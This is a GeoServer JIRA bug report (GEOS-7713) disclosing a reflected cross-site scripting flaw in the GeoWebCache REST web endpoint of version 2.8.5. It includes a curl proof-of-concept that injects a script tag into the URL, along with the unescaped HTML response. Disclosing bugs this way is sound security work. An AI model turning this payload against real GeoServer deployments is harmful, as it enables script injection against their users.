[Geoserver-devel] [JIRA] (GEOS-7713) Another XSS vulnerability in GWC

Juraj Hrubša created an issue

GeoServer / BugGEOS-7713

Another XSS vulnerability in GWC

Issue Type:

BugBug

Affects Versions:

2.8.5

Assignee:

Unassigned

Components:

Vulnerability

Created:

02/Sep/16 4:29 PM

Environment:

Tomcat 7, OpenJDK 1.8.0_102

Labels:

security geoserver

Priority:

MediumMedium

Reporter:

Juraj Hrubša

Running

curl 'http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>'

yields an answer with unescaped HTML:

<html><body>
<a id="logo" href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</"><img src="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/web/geowebcache_logo.png" alt="" height="100" width="353" border="0"/></a>
<h3>Resources available from here:</h3><ul><li><h4><a href="http://localhost:8080/geoserver/gwc/rest/web/"><script>alert(1)</script>/layers/">layers</a></h4>Lets you see the configured layers. You can also view a specific layer  by appending the name of the layer to the URL, DELETE an existing layer  or POST a new one. Note that the latter operations only make sense when GeoWebCache has been configured through geowebcache.xml. You can POST either XML or JSON.</li>
<li><h4>seed</h4></li>
</ul></body></html>

Looks like the problem is similar to GEOS-7549 Resolved .

Add Comment

Add Comment

This message was sent by Atlassian JIRA (v1000.305.0#100011-sha1:1dc2d9a)

Atlassian logo